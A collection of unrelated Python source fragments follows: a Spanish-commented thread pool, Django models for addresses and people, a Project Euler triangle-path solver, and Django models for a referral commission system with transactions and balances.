#los tasks a realizar son representados por un Queue. En este caso estamos
#inicializando un FIFO Queue. El parametro que recibe es el maximo de elementos
#que pueden estar en este Queue.
self.tasks = Queue(num_hilos)
#Inicializamos un Trabajador por cada uno de los num_hilos especificados.
#(un worker por hilo). Y los ponemos a trabajar en los tasks que se encuentran
#en el queue. Como Queue es un objeto entonces todos los workers van a referenciar
#a la misma instancia de Queue, osea que todos pueden ver cuando un nuevo task se
#agrega, pero solo uno puede trabajar en el nuevo task (aqui es donde el objeto Queue
#implementa el control de acceso por nosotros)
for i in range(num_hilos):
Trabajador(self.tasks)
#este metodo permite agregar un task al queue. Los tasks vienen representados por una funcion
#(metodo) y sus argumentos ('*args' y '**kwargs') asi los workers lo unico que tienen que hacer
#es ejecutar la funcion y pasarle los metodos.
def add_task(self, function, *args, **kwargs):
self.tasks.put((function, args, kwargs)) #agregamos el task al queue
def __str__(self):
return 'Tasks del Thread Pool: %s' % self.tasks
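# Usage sketch (an assumption: it presumes Trabajador consumes
# (function, args, kwargs) tuples from the shared queue, as described above):
if __name__ == '__main__':
    def greet(name):
        print 'Hello %s' % name
    pool = ThreadPool(4)
    for n in ('Ana', 'Luis'):
        pool.add_task(greet, n)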
|
from django.db import models
from django.contrib.auth.models import User
import datetime
from django.utils import timezone
# Create your models here.
class class1(models.Model):
name = models.CharField(max_length=30, blank=True)
class Meta:
db_table = '_App1_class1'
class class2(models.Model):
name = models.CharField(max_length=30, blank=True)
class1s = models.ManyToManyField(class1,)
class Meta:
db_table = '_App1_class2'
class BaseModel(models.Model):
    active = models.BooleanField(default=True)
created_by = models.ForeignKey(User, on_delete=models.PROTECT, default='0', related_name='%(class)s_Creator')
created = models.DateTimeField(auto_now_add=True, blank=False)
modified_by = models.ForeignKey(User, on_delete=models.PROTECT, default='0', related_name='%(class)s_modified_by')
modified = models.DateTimeField(auto_now=True, blank=False)
class Meta:
abstract = True
class Address(BaseModel):
Home = 1
Work = 2
Other = 0
TYPES_CHOICES = (
(Home, 'HOME'),
(Work, 'Work'),
(Other, 'Other')
)
    type = models.CharField(max_length=20, choices=TYPES_CHOICES)
    street_line1 = models.CharField(max_length=100, blank=True)
    street_line2 = models.CharField(max_length=100, blank=True)
    city = models.CharField(max_length=100, blank=True)
    state = models.CharField(max_length=100, blank=True)
    zipcode = models.CharField(max_length=5, blank=True)
    country = models.CharField(max_length=100, blank=True)
class Person(BaseModel):
name = models.CharField(max_length=30, blank=True)
userId = models.ForeignKey(User, on_delete=models.CASCADE, blank=True)
def __str__(self):
return self.name
|
#!/usr/bin/python
arr = [line.rstrip('\n') for line in open('problem_67.in')]
for i in range(0, len(arr)):
arr[i] = list(arr[i].split(" "))
for j in range(0, len(arr[i])):
arr[i][j] = int(arr[i][j])
# fold the triangle bottom-up: each entry absorbs the larger of its two children
holdSums = arr[len(arr) - 1]
for i in range(len(arr) - 2, -1, -1):
sums = arr[i]
for j in range(0, len(sums)):
if holdSums[j] > holdSums[j + 1]:
sums[j] += holdSums[j]
else:
sums[j] += holdSums[j + 1]
holdSums = sums
print(holdSums[0])
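# Worked example (illustrative): for the small triangle
#   3 / 7 4 / 2 4 6 / 8 5 9 3
# the bottom-up pass yields 23 (3 + 7 + 4 + 9).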
|
import uuid
import enum
from django.db import models
from django.utils import timezone, translation
from django.conf import settings
from django.core.validators import MinValueValidator, MaxValueValidator
from django.contrib.auth import get_user_model
from django.contrib.contenttypes.models import ContentType
from django.contrib.contenttypes.fields import GenericForeignKey, GenericRelation
from django_numerators.models import NumeratorMixin
from mptt.models import MPTTModel, TreeForeignKey, TreeManager
_ = translation.ugettext_lazy
class GradeClass(enum.Enum):
CLASS_A = 'A'
CLASS_B = 'B'
CLASS_C = 'C'
CLASS_D = 'D'
CLASS_E = 'E'
class RuleClass(enum.Enum):
RULE_A = 'A'
RULE_B = 'B'
RULE_C = 'C'
RULE_D = 'D'
RULE_E = 'E'
class Grade(models.Model):
class Meta:
ordering = ['slug']
verbose_name = _('Grade')
        verbose_name_plural = _('Grades')
id = models.UUIDField(
default=uuid.uuid4,
editable=False,
primary_key=True,
verbose_name='uuid')
slug = models.SlugField(
unique=True,
max_length=80,
choices=[(str(x.value), str(x.name.replace('_', ' '))) for x in GradeClass],
default=GradeClass.CLASS_A.value,
verbose_name=_("Slug"))
name = models.CharField(
max_length=80, unique=True,
verbose_name=_('Name'))
description = models.CharField(
max_length=500, blank=True)
def __str__(self):
return self.name
class Rate(models.Model):
class Meta:
verbose_name = _('Rate')
        verbose_name_plural = _('Rates')
ordering = ['slug']
id = models.UUIDField(
default=uuid.uuid4,
editable=False,
primary_key=True,
verbose_name='uuid')
slug = models.SlugField(
unique=True,
max_length=80,
choices=[(str(x.value), str(x.name.replace('_', ' '))) for x in GradeClass],
default=GradeClass.CLASS_A.value,
verbose_name=_("Slug"))
name = models.CharField(
max_length=80, unique=True,
verbose_name=_('Name'))
description = models.CharField(
max_length=500, blank=True)
def __str__(self):
return self.name
class Rule(models.Model):
class Meta:
verbose_name = _('Rule')
        verbose_name_plural = _('Rules')
ordering = ['slug']
id = models.UUIDField(
default=uuid.uuid4,
editable=False,
primary_key=True,
verbose_name='uuid')
slug = models.SlugField(
unique=True,
max_length=80,
choices=[(str(x.value), str(x.name.replace('_', ' '))) for x in RuleClass],
default=RuleClass.RULE_A.value,
verbose_name=_("Slug"))
name = models.CharField(
max_length=80, unique=True,
verbose_name=_('Name'))
description = models.CharField(
max_length=500, blank=True)
weighting = models.DecimalField(
max_digits=4,
decimal_places=2,
validators=[
MinValueValidator(0),
MaxValueValidator(100)
]
)
def __str__(self):
return self.name
class GradeRate(models.Model):
class Meta:
verbose_name = _('Grade Rate')
verbose_name_plural = _('Grade Rates')
unique_together = ('grade', 'rate')
ordering = ['rate__slug']
id = models.UUIDField(
default=uuid.uuid4,
editable=False,
primary_key=True,
verbose_name='uuid')
grade = models.ForeignKey(
Grade, on_delete=models.CASCADE,
verbose_name=_("Grade"))
rate = models.ForeignKey(
Rate, on_delete=models.CASCADE,
verbose_name=_("Rate"))
fee_rate = models.DecimalField(
max_digits=4,
decimal_places=2,
validators=[
MinValueValidator(0),
MaxValueValidator(100)
]
)
def __str__(self):
return "%s %s" % (self.grade.name, self.rate.name)
class GradeRule(models.Model):
class Meta:
verbose_name = _('Grade Rule')
verbose_name_plural = _('Grade Rules')
unique_together = ('grade', 'rule')
ordering = ['rule__slug']
id = models.UUIDField(
default=uuid.uuid4,
editable=False,
primary_key=True,
verbose_name='uuid')
grade = models.ForeignKey(
Grade, on_delete=models.CASCADE,
verbose_name=_("Grade"))
rule = models.ForeignKey(
Rule, on_delete=models.CASCADE,
verbose_name=_("Rule"))
min_value = models.DecimalField(
max_digits=15,
decimal_places=2,
validators=[
MinValueValidator(0),
MaxValueValidator(5000000000)
]
)
max_value = models.DecimalField(
max_digits=15,
decimal_places=2,
validators=[
MinValueValidator(0),
MaxValueValidator(5000000000)
]
)
def __str__(self):
return "%s %s" % (self.grade.name, self.rule.name)
class ReferralManager(TreeManager):
pass
class Referral(NumeratorMixin, MPTTModel, models.Model):
class Meta:
verbose_name = _('Referral')
        verbose_name_plural = _('Referrals')
unique_together = ('parent', 'account')
limit = 3
id = models.UUIDField(
default=uuid.uuid4,
editable=False,
primary_key=True,
verbose_name='uuid')
parent = TreeForeignKey(
'self', null=True, blank=True,
on_delete=models.SET_NULL,
related_name='downlines',
verbose_name=_('Up Line'))
account = models.OneToOneField(
get_user_model(),
on_delete=models.CASCADE,
verbose_name=_('account'))
balance = models.DecimalField(
default=0,
max_digits=15,
decimal_places=2,
editable=False,
verbose_name=_("Balance"))
created_at = models.DateTimeField(
default=timezone.now, editable=False)
def __str__(self):
return (
self.account.username
if self.account.get_full_name() in ['', None]
else self.account.get_full_name()
)
def update_balance(self, balance):
self.balance = balance
self.save()
def get_referral_limit(self):
return getattr(settings, 'REFERRAL_DOWNLINE_LIMIT', None) or self.limit
def get_uplines(self):
return self.get_ancestors(include_self=False, ascending=True)[:self.get_referral_limit()]
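
# Usage sketch (hypothetical caller code, assuming django-mptt is installed
# and the referral tree is persisted): credit a commission to each upline,
# walking at most get_referral_limit() levels up the tree. fee_amount and
# upline_rate are illustrative names, not fields of this module.
#
#   referral = Referral.objects.get(account=some_user)
#   for upline in referral.get_uplines():
#       Transaction.objects.create(
#           referral=upline,
#           flow='IN',
#           amount=fee_amount,
#           rate=upline_rate,
#       )
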
class Transaction(NumeratorMixin):
class Meta:
ordering = ['-created_at']
verbose_name = _('Transaction')
verbose_name_plural = _('Transactions')
id = models.UUIDField(
default=uuid.uuid4,
editable=False,
primary_key=True,
verbose_name='uuid')
flow = models.CharField(
max_length=3,
choices=(('IN', 'In'), ('OUT', 'Out')),
default='IN', verbose_name=_('Flow'))
referral = models.ForeignKey(
Referral, on_delete=models.CASCADE,
related_name='transactions',
verbose_name=_("Referral"))
amount = models.DecimalField(
default=0,
max_digits=15,
decimal_places=2,
verbose_name=_("Amount"))
rate = models.DecimalField(
default=0.00,
max_digits=5,
decimal_places=2,
validators=[
MinValueValidator(0),
MaxValueValidator(100)
],
verbose_name=_('Rate'))
total = models.DecimalField(
default=0,
max_digits=15,
decimal_places=2,
verbose_name=_("Total"))
old_balance = models.DecimalField(
default=0,
max_digits=15,
decimal_places=2,
editable=False,
verbose_name=_("Old Balance"))
balance = models.DecimalField(
default=0,
max_digits=15,
decimal_places=2,
editable=False,
verbose_name=_("Balance"))
note = models.CharField(
max_length=250,
null=True, blank=True,
verbose_name=_('Note'))
created_at = models.DateTimeField(
default=timezone.now, editable=False)
is_verified = models.BooleanField(
default=False)
verified_at = models.DateTimeField(
null=True, blank=True,
editable=False,
verbose_name=_("Verified at"))
content_type = models.ForeignKey(
ContentType,
models.SET_NULL,
blank=True, null=True,
verbose_name=_('reference type'))
object_id = models.CharField(
_('reference id'),
max_length=100,
blank=True, null=True)
content_object = GenericForeignKey()
def __str__(self):
return self.inner_id
    def increase_balance(self):
        # 'IN' flow: add this transaction's total to the referral's balance.
        self.balance = self.referral.balance + self.total
        return self.balance

    def decrease_balance(self):
        # 'OUT' flow: subtract this transaction's total from the balance.
        self.balance = self.referral.balance - self.total
        return self.balance

    def calculate_balance(self):
        # Snapshot the pre-transaction balance, then dispatch on flow.
        self.old_balance = self.referral.balance
        return {'IN': self.increase_balance, 'OUT': self.decrease_balance}[self.flow]()

    def get_total(self):
        # rate is a percentage, so total = amount * rate / 100.
        return (self.amount * self.rate) / 100

    def save(self, *args, **kwargs):
        # Totals and balances are recomputed on every save; note that
        # re-saving an existing row recalculates against the referral's
        # current balance rather than the stored old_balance.
        self.total = self.get_total()
        self.calculate_balance()
        super().save(*args, **kwargs)
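
# Worked example (illustrative numbers): for amount=200000 and rate=2.5,
# get_total() yields 200000 * 2.5 / 100 = 5000. With flow='IN' and a prior
# referral balance of 10000, save() records old_balance=10000 and
# balance=15000; flow='OUT' would record balance=5000 instead.
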
class AbstractReceivable(NumeratorMixin, models.Model):
class Meta:
abstract = True
creator = models.ForeignKey(
get_user_model(), null=True, blank=True,
on_delete=models.CASCADE)
referral = models.ForeignKey(
Referral, null=True, blank=True,
related_name="%(class)s_referrals",
on_delete=models.CASCADE)
campaigner = models.ForeignKey(
Referral, null=True, blank=True,
related_name="%(class)s_campaigns",
on_delete=models.CASCADE)
amount = models.DecimalField(
max_digits=15,
decimal_places=2, default=0)
transaction = GenericRelation(
Transaction,
related_query_name='transactions')
is_paid = models.BooleanField(
default=False, editable=False)
is_cancelled = models.BooleanField(
default=False, editable=False)


class AbstractPayable(NumeratorMixin, models.Model):
class Meta:
abstract = True
creator = models.ForeignKey(
get_user_model(), on_delete=models.CASCADE)
referral = models.ForeignKey(
Referral, on_delete=models.CASCADE)
amount = models.DecimalField(
max_digits=15, decimal_places=2, default=0)
transaction = GenericRelation(Transaction, related_query_name='transactions')
is_paid = models.BooleanField(default=False, editable=False)
is_cancelled = models.BooleanField(default=False, editable=False)
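
# Sketch of a concrete subclass (hypothetical model, not part of this file):
# inheriting one of the abstract bases gives the subclass its own table with
# the creator/referral/amount columns plus the GenericRelation to Transaction.
# inner_id is assumed to come from NumeratorMixin, as Transaction.__str__
# suggests.
#
#   class Commission(AbstractReceivable):
#       note = models.CharField(max_length=250, blank=True)
#
#       def __str__(self):
#           return self.inner_id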